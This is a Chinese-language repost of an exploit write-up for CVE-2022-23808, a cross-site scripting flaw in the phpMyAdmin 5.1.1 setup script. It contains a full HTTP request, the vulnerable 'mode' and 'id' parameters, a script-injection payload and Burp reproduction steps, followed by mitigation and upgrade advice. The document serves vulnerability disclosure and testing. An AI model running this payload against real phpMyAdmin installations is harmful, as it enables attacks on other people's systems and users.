CVE-2022-23808 phpMyAdmin 跨站脚本漏洞EXP
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/dipakpanchal456/CVE-2022-23808
phpMyAdmin EXP
漏洞利用标题: phpMyAdmin 5.1.1 - XSS(跨站点脚本)
漏洞利用作者: Dipak Panchal ( @th3.d1p4k )
供应商主页: https ://www.phpmyadmin.net
软件链接: https ://www.phpmyadmin.net /files/5.1.1/
受影响的版本: 5.1.2 之前的 5.1 分支的 phpMyAdmin 版本受到影响。
测试: Windows 10 和 Linux
CVE: CVE-2022-23808
参考: https ://www.phpmyadmin.net/security/PMASA-2022-2/
描述:
已经发现了一系列弱点,这些弱点可能允许攻击者将恶意代码注入到安装脚本的各个方面,从而允许 XSS 或 HTML 注入。
要求:
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
易受攻击的参数:
- 模式
- ID
有效载荷:
">'><script>alert(document.domain)</script>
重现步骤 :
- 在 burp 中捕获高于 reuqest。
- 用易受攻击的参数替换/更改 XSS 有效负载。
- 单击发送并在浏览器中显示响应。
- 你会弹出!
概念证明(POC):

缓解:
带有配置文件 config.inc.php 的 phpMyAdmin 安装将不允许访问设置脚本,这反过来又减轻了这种攻击。
使固定 :
升级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。
标签:工具分享, 漏洞分享